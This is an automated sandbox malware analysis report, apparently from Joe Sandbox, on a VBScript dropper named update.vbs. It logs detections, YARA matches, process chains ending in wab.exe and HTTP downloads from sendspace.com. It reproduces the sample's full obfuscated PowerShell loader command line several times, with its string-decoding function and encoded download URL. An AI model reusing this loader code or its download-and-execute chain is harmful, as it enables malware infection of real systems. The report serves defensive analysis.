BugseTSulai: tran\W,sseDAppleiShab,mTil.sySmnde.UnadutRligsx Ekstt trep)Marke{WhiteeD.bstxPosthioplbetBes,a}.onre;Overs ');$Unensouled = Concolor 'Tu,lieFrknec PalmhBla,koLa el .erde% hantaOraklpGodtepFrancdVarmeamaggitUntemaBedri%Beslu\UnderAMucoscFlskeeRatiot Ungry Kakol DeramOverteBourotpa,eih SognyGrisslTilbycKnl.daMe.virForh bF.riniWal,inForuroMisi.lRdstj. ,urrRUsseloSkndinRende D,mit& Ossa& flam LyskoeVul,scGdninh AcetoEnerg skr.p$Stade ';ratlaasene (Concolor 'Gr nd$ Ind,g.dhullVoda.oDespob freda Pte,lHedg,:W.llsPSp bra Reg,g Kab,aU,sidn DeciiHologsY,lloh,ende7Misco3Apo.i=Aya o(B.slac CrakmtvistdCh,rd Cubby/honeyconsla Auric$ C.raUSluednHexaceDesinnMe,dosAnenco Du.auMan.ali,trae Rentd Kuve)Flere ');ratlaasene (Concolor ' Ggep$O tspgGunmal Po toChamob Ts.racan,llParad:OperaJWasteuOmstyb SteriHavgalStrikaNo petDeodoo Ef.erForpoyPaabu= Obse$V.agmBDiploo Op ygmed,tbHazariA,arynToecadEks.ee ,lepr hjskiSuper.CatapsTunenpTe.nglUnbeliSerpet.erip(,mora$ PremPDeuterSkruma Ads,kAk,ierRgskyiOverdt Be.aiPrebr)Svovl ');$Bogbinderi=$Jubilatory[0];ratlaasene (Concolor 'Te ef$UnbesgPartilO ermoAlt rbP.inca
              No Snort rule has matched


              AV Detection

Source: http://pesterbdd.com/images/Pester.png | URL Reputation: Label: malware
Source: Submited Sample | Integrated Neural Analysis Model: Matched 99.7% probability
Source: unknown | HTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: Binary string: System.Management.Automation.pdb | source: powershell.exe, 00000005.00000002.2565659187.00000000076C0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb4 | source: powershell.exe, 00000005.00000002.2565659187.00000000077AA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb | source: powershell.exe, 00000005.00000002.2565659187.000000000771D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb | source: powershell.exe, 00000005.00000002.2565659187.000000000771D000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\

              Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: Joe Sandbox View | IP Address: 69.31.136.57 69.31.136.57
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected: GET /pro/dl/7dhid7 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: www.sendspace.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /dlpro/008892344a2eed7a827a87fc8083ccb1/664f6de2/7dhid7/Castrate.xtp HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: fs13n1.sendspace.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /pro/dl/medjl1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: www.sendspace.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /dlpro/00d1105b5897edd15778b456a79f5e45/664f6e0b/medjl1/lLQuXHVIIjCqr119.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Cache-Control: no-cache | Host: fs03n2.sendspace.com | Connection: Keep-Alive | Cookie: SID=9rlcod4jutplauo2untp3jfqk6
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /pro/dl/7dhid7 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: www.sendspace.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /dlpro/008892344a2eed7a827a87fc8083ccb1/664f6de2/7dhid7/Castrate.xtp HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: fs13n1.sendspace.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /pro/dl/medjl1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: www.sendspace.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /dlpro/00d1105b5897edd15778b456a79f5e45/664f6e0b/medjl1/lLQuXHVIIjCqr119.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Cache-Control: no-cache | Host: fs03n2.sendspace.com | Connection: Keep-Alive | Cookie: SID=9rlcod4jutplauo2untp3jfqk6
Source: global traffic | DNS traffic detected: DNS query: www.sendspace.com
Source: global traffic | DNS traffic detected: DNS query: fs13n1.sendspace.com
Source: global traffic | DNS traffic detected: DNS query: fs03n2.sendspace.com
Source: powershell.exe, 00000005.00000002.2565659187.000000000771D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microt
Source: powershell.exe, 00000002.00000002.2635114145.0000026F2FE42000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fs13n1.sendspace.com
Source: powershell.exe, 00000002.00000002.2737781412.0000026F3F960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2561974227.0000000005CD8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.2558091111.0000000004DC8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2635114145.0000026F2F8F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2558091111.0000000004C71000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.2558091111.0000000004DC8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2635114145.0000026F31AED000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sendspace.com
Source: powershell.exe, 00000002.00000002.2635114145.0000026F2F8F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.2558091111.0000000004C71000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000005.00000002.2561974227.0000000005CD8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.2561974227.0000000005CD8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.2561974227.0000000005CD8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: wab.exe, 00000008.00000002.2724545147.000000000069D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fs03n2.sendspace.com/
Source: wab.exe, 00000008.00000003.2547665932.00000000006A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537341476.00000000006A4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fs03n2.sendspace.com/.
Source: wab.exe, 00000008.00000003.2537341476.00000000006A4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fs03n2.sendspace.com/5778b456a79f5e45/664f6e0b/medjl1/lLQuXHVIIjCqr119.bin
Source: wab.exe, 00000008.00000003.2537341476.00000000006A4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fs03n2.sendspace.com/dlpro/00d1105b5897edd15778b456a79f5e45/664f6e0b/medjl1/lLQuXHVIIjCqr119
              Source: wab.exe, 00000008.00000003.2547665932.00000000006A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537341476.00000000006A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs03n2.sendspace.com/m
              Source: wab.exe, 00000008.00000003.2537341476.00000000006A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs03n2.sendspace.com/om:443l
              Source: powershell.exe, 00000002.00000002.2635114145.0000026F31B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fs13n1.sendspaX
              Source: powershell.exe, 00000002.00000002.2635114145.0000026F31B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fs13n1.sendspace.com
              Source: powershell.exe, 00000002.00000002.2635114145.0000026F2FE2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2635114145.0000026F31B0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2635114145.0000026F2FE13000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2635114145.0000026F31AED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2635114145.0000026F31B12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2635114145.0000026F2FE30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fs13n1.sendspace.com/dlpro/008892344a2eed7a827a87fc8083ccb1/664f6de2/7dhid7/Castrate.xtp
              Source: powershell.exe, 00000002.00000002.2635114145.0000026F2FE30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fs13n1.sendspace.com0
              Source: powershell.exe, 00000005.00000002.2558091111.0000000004DC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.2635114145.0000026F30E0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000002.00000002.2737781412.0000026F3F960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2561974227.0000000005CD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000002.00000002.2635114145.0000026F2FB17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2635114145.0000026F3192E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com
              Source: wab.exe, 00000008.00000002.2724545147.0000000000638000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/
              Source: wab.exe, 00000008.00000002.2724545147.0000000000638000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/IwX
              Source: powershell.exe, 00000002.00000002.2635114145.0000026F2FB17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/7dhid7P
              Source: powershell.exe, 00000005.00000002.2558091111.0000000004DC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/7dhid7XR
              Source: wab.exe, 00000008.00000002.2724545147.0000000000673000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.2725055070.0000000000750000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537341476.00000000006A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/medjl1
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownHTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.5:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.5:49714 version: TLS 1.2

              System Summary

              Source: amsi64_1988.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
              Source: amsi32_2624.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 1988, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 2624, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
              Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 7309
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: Commandline size = 7309
              Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$verdensfjerneconomatic = 1;$Vastities='Su';$Vastities+='bstrin';$Vastities+='g';Function Concolor($Weaselly){$Genoptagelserne=$Weaselly.Length-$verdensfjerneconomatic;For($verdensfjerne=5;$verdensfjerne -lt $Genoptagelserne;$verdensfjerne+=6){$Tetanuses+=$Weaselly.$Vastities.Invoke( $verdensfjerne, $verdensfjerneconomatic);}$Tetanuses;}function ratlaasene($Kontrasts){& ($Protektionerne) ($Kontrasts);}$Zemas=Concolor 'Ka,riMMisaloFor,azRet.si ,ymplexponlD.scoaForts/Rug,k5cirku.Hyp,t0Stimu Runds( annuWSavori CardnReguld reecoHvi.ewAntissPrea so,mNKd,onTProdu non,l1Autoe0Kamer.I.otr0Trans;rejse Inn.WPres.iB,kenn Trkn6Stift4Super; ef e Hi,loxUdst 6Rygel4Quidd;Termo PensrProtevSiali: Semi1 Over2Marsi1Tmrer.Konto0 aria),msae jeerGSolodeKunstcfaberk frakoHypos/ lowp2Tridk0bogca1Vas,e0Damas0 ervi1Finge0Diphe1Stage K mplFMann iSwashr G,ute,udsjfCanceoFrustxsmin /Premi1Bered2Porce1 Xeno.voxe,0Antip ';$Egenartets=Concolor 'BathmU MorgsetuieeMarksrDepic-HaanlASagtmgAthaleSplitnFore,t Ther ';$Bogbinderi=Concolor '.engehpolyttTangltOv rapBridgs Tact:Grund/Optog/Snkniw,rickwAftrywDevot.SregnsP rsoeLnmo,n Sandd .ymmsD flopDysuraDaarlcVandfeImipr.Bottlc Af,eo N mamAntid/ b.skpPokinr .nsooYvonn/Exs.fd ,niflprste/Monop7 ightdVulcahAcantiSkannd .mmu7Spawn ';$Prakriti=Concolor 'Fangs>Neigh ';$Protektionerne=Concolor 'damesiGr.fie homoxM,til ';$Dournesses='Forureningskildens';ratlaasene (Concolor 'NatioSNyt ieSammetpea.a-Bedl,CNont o FrognanskatLivreeAssonn F.lkt Thic D sse-DerriPEdifiaOrgantProvih .jen Per.eTDisse: Tykn\BetonDSk.kkiOverimSti,lyUrban.LakfatFi,kexvr,retBygrn Skave-grassVFejlfaDiplol San u B egeJosfl Bombe$Lab.aDNoncooWooleu GemarUdso.nEnerge Ap.ssFlosssPreh,e KommsApoko; ,top ');ratlaasene (Concolor 'Mout.i DambfLor.e Wiver(AdscitTrocte Foras leoptAl al- LeiopPlastaOverftRetarh Tour 
BugseTSulai: tran\W,sseDAppleiShab,mTil.sySmnde.UnadutRligsx Ekstt trep)Marke{WhiteeD.bstxPosthioplbetBes,a}.onre;Overs ');$Unensouled = Concolor 'Tu,lieFrknec PalmhBla,koLa el .erde% hantaOraklpGodtepFrancdVarmeamaggitUntemaBedri%Beslu\UnderAMucoscFlskeeRatiot Ungry Kakol DeramOverteBourotpa,eih SognyGrisslTilbycKnl.daMe.virForh bF.riniWal,inForuroMisi.lRdstj. ,urrRUsseloSkndinRende D,mit& Ossa& flam LyskoeVul,scGdninh AcetoEnerg skr.p$Stade ';ratlaasene (Concolor 'Gr nd$ Ind,g.dhullVoda.oDespob freda Pte,lHedg,:W.llsPSp bra Reg,g Kab,aU,sidn DeciiHologsY,lloh,ende7Misco3Apo.i=Aya o(B.slac CrakmtvistdCh,rd Cubby/honeyconsla Auric$ C.raUSluednHexaceDesinnMe,dosAnenco Du.auMan.ali,trae Rentd Kuve)Flere ');ratlaasene (Concolor ' Ggep$O tspgGunmal Po toChamob Ts.racan,llParad:OperaJWasteuOmstyb SteriHavgalStrikaNo petDeodoo Ef.erForpoyPaabu= Obse$V.agmBDiploo Op ygmed,tbHazariA,arynToecadEks.ee ,lepr hjskiSuper.CatapsTunenpTe.nglUnbeliSerpet.erip(,mora$ PremPDeuterSkruma Ads,kAk,ierRgskyiOverdt Be.aiPrebr)Svovl ');$Bogbinderi=$Jubilatory[0];ratlaasen
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FF848F1D602
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FF848F1C856
              Source: update.vbs | Initial sample: Strings found which are bigger than 50
              Source: amsi64_1988.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: amsi32_2624.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 1988, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 2624, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engine | Classification label: mal100.troj.expl.evad.winVBS@13/9@3/3
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Acetylmethylcarbinol.Ron
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Mutant created: \Sessions\1\BaseNamedObjects\MutexPolesskayaGlush*.* svchost.com n X . t N t h ` T 5
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5788:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fcqrymq3.s22.ps1
              Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.vbs"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1988
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2624
              Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Acetylmethylcarbinol.Ron && echo $"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$verdensfjerneconomatic = 1;$Vastities='Su';$Vastities+='bstrin';$Vastities+='g';Function Concolor($Weaselly){$Genoptagelserne=$Weaselly.Length-$verdensfjerneconomatic;For($verdensfjerne=5;$verdensfjerne -lt $Genoptagelserne;$verdensfjerne+=6){$Tetanuses+=$Weaselly.$Vastities.Invoke( $verdensfjerne, $verdensfjerneconomatic);}$Tetanuses;}function ratlaasene($Kontrasts){& ($Protektionerne) ($Kontrasts);}$Zemas=Concolor 'Ka,riMMisaloFor,azRet.si ,ymplexponlD.scoaForts/Rug,k5cirku.Hyp,t0Stimu Runds( annuWSavori CardnReguld reecoHvi.ewAntissPrea so,mNKd,onTProdu non,l1Autoe0Kamer.I.otr0Trans;rejse Inn.WPres.iB,kenn Trkn6Stift4Super; ef e Hi,loxUdst 6Rygel4Quidd;Termo PensrProtevSiali: Semi1 Over2Marsi1Tmrer.Konto0 aria),msae jeerGSolodeKunstcfaberk frakoHypos/ lowp2Tridk0bogca1Vas,e0Damas0 ervi1Finge0Diphe1Stage K mplFMann iSwashr G,ute,udsjfCanceoFrustxsmin /Premi1Bered2Porce1 Xeno.voxe,0Antip ';$Egenartets=Concolor 'BathmU MorgsetuieeMarksrDepic-HaanlASagtmgAthaleSplitnFore,t Ther ';$Bogbinderi=Concolor '.engehpolyttTangltOv rapBridgs Tact:Grund/Optog/Snkniw,rickwAftrywDevot.SregnsP rsoeLnmo,n Sandd .ymmsD flopDysuraDaarlcVandfeImipr.Bottlc Af,eo N mamAntid/ b.skpPokinr .nsooYvonn/Exs.fd ,niflprste/Monop7 ightdVulcahAcantiSkannd .mmu7Spawn ';$Prakriti=Concolor 'Fangs>Neigh ';$Protektionerne=Concolor 'damesiGr.fie homoxM,til ';$Dournesses='Forureningskildens';ratlaasene (Concolor 'NatioSNyt ieSammetpea.a-Bedl,CNont o FrognanskatLivreeAssonn F.lkt Thic D sse-DerriPEdifiaOrgantProvih .jen Per.eTDisse: Tykn\BetonDSk.kkiOverimSti,lyUrban.LakfatFi,kexvr,retBygrn Skave-grassVFejlfaDiplol San u B egeJosfl Bombe$Lab.aDNoncooWooleu GemarUdso.nEnerge Ap.ssFlosssPreh,e KommsApoko; ,top ');ratlaasene (Concolor 'Mout.i DambfLor.e Wiver(AdscitTrocte Foras leoptAl al- 
LeiopPlastaOverftRetarh Tour BugseTSulai: tran\W,sseDAppleiShab,mTil.sySmnde.UnadutRligsx Ekstt trep)Marke{WhiteeD.bstxPosthioplbetBes,a}.onre;Overs ');$Unensouled = Concolor 'Tu,lieFrknec PalmhBla,koLa el .erde% hantaOraklpGodtepFrancdVarmeamaggitUntemaBedri%Beslu\UnderAMucoscFlskeeRatiot Ungry Kakol DeramOverteBourotpa,eih SognyGrisslTilbycKnl.daMe.virForh bF.riniWal,inForuroMisi.lRdstj. ,urrRUsseloSkndinRende D,mit& Ossa& flam LyskoeVul,scGdninh AcetoEnerg skr.p$Stade ';ratlaasene (Concolor 'Gr nd$ Ind,g.dhullVoda.oDespob freda Pte,lHedg,:W.llsPSp bra Reg,g Kab,aU,sidn DeciiHologsY,lloh,ende7Misco3Apo.i=Aya o(B.slac CrakmtvistdCh,rd Cubby/honeyconsla Auric$ C.raUSluednHexaceDesinnMe,dosAnenco Du.auMan.ali,trae Rentd Kuve)Flere ');ratlaasene (Concolor ' Ggep$O tspgGunmal Po toChamob Ts.racan,llParad:OperaJWasteuOmstyb SteriHavgalStrikaNo petDeodoo Ef.erForpoyPaabu= Obse$V.agmBDiploo Op ygmed,tbHazariA,arynToecadEks.ee ,lepr hjskiSuper.CatapsTunenpTe.nglUnbeliSerpet.erip(,mora$ PremPDeuterSkruma Ads,kAk,ierRgskyiOverdt Be.aiPrebr)Svovl ');$Bogbinderi=$Jubilatory[0];ratlaasen
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Acetylmethylcarbinol.Ron && echo $"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
